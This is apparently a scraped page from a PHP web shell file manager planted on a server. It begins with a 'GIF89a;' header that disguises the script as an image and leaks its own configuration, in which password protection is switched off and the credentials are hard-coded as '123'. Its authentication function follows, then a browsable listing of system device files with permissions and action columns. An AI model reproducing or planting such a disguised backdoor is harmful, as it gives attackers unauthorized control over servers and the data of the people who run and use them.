GIF89a; # Konfigurasyon $sayfaSifreleme ='0'; # 1 acik , 0 kapali $kullaniciAdi = '123'; $sifre = '123'; # yetki kontrol fonksiyonu function yetkiKontrol($kullaniciAdi,$sifre) { if(empty($_SERVER['PHP_AUTH_USER']) || empty($_SERVER['PHP_AUTH_PW']) || $_SERVER['PHP_AUTH_USER'] != "$kullaniciAdi" || $_SERVER['PHP_AUTH_PW'] != "$sifre") { header('WWW-Authenticate: Basic realm="x"'); die(header('HTTP/1.0 401 Unauthorized')); } } # Sayfa Sifreleme aciksa if($sayfaSifreleme =='1') { # Veri ve sifre kontrolu yetkiKontrol($kullaniciAdi,$sifre); } ?>
| Name | Size | Modified | Perms | Actions | |
|---|---|---|---|---|---|
| device | --- | April 23 2025 11:30:51. | 0755 | ||
| subsystem | --- | April 23 2025 11:30:52. | 0755 | ||
| FUA | 4.00 KB | October 30 2025 22:27:33. | 0444 | ||
| allow_restart | 4.00 KB | October 30 2025 22:27:33. | 0644 | ||
| app_tag_own | 4.00 KB | October 30 2025 22:27:33. | 0444 | ||
| cache_type | 4.00 KB | October 30 2025 22:27:33. | 0644 | ||
| manage_start_stop | 4.00 KB | October 30 2025 22:27:33. | 0644 | ||
| max_medium_access_timeouts | 4.00 KB | October 30 2025 22:27:33. | 0644 | ||
| max_retries | 4.00 KB | October 30 2025 22:27:33. | 0644 | ||
| max_write_same_blocks | 4.00 KB | October 30 2025 22:27:33. | 0644 | ||
| protection_mode | 4.00 KB | October 30 2025 22:27:33. | 0444 | ||
| protection_type | 4.00 KB | October 30 2025 22:27:33. | 0644 | ||
| provisioning_mode | 4.00 KB | October 30 2025 02:08:26. | 0644 | ||
| thin_provisioning | 4.00 KB | October 30 2025 22:27:33. | 0444 | ||
| uevent | 4.00 KB | April 23 2025 11:30:52. | 0644 | ||
| zeroing_mode | 4.00 KB | October 30 2025 22:27:33. | 0644 | ||
| zoned_cap | 4.00 KB | October 30 2025 22:27:33. | 0444 |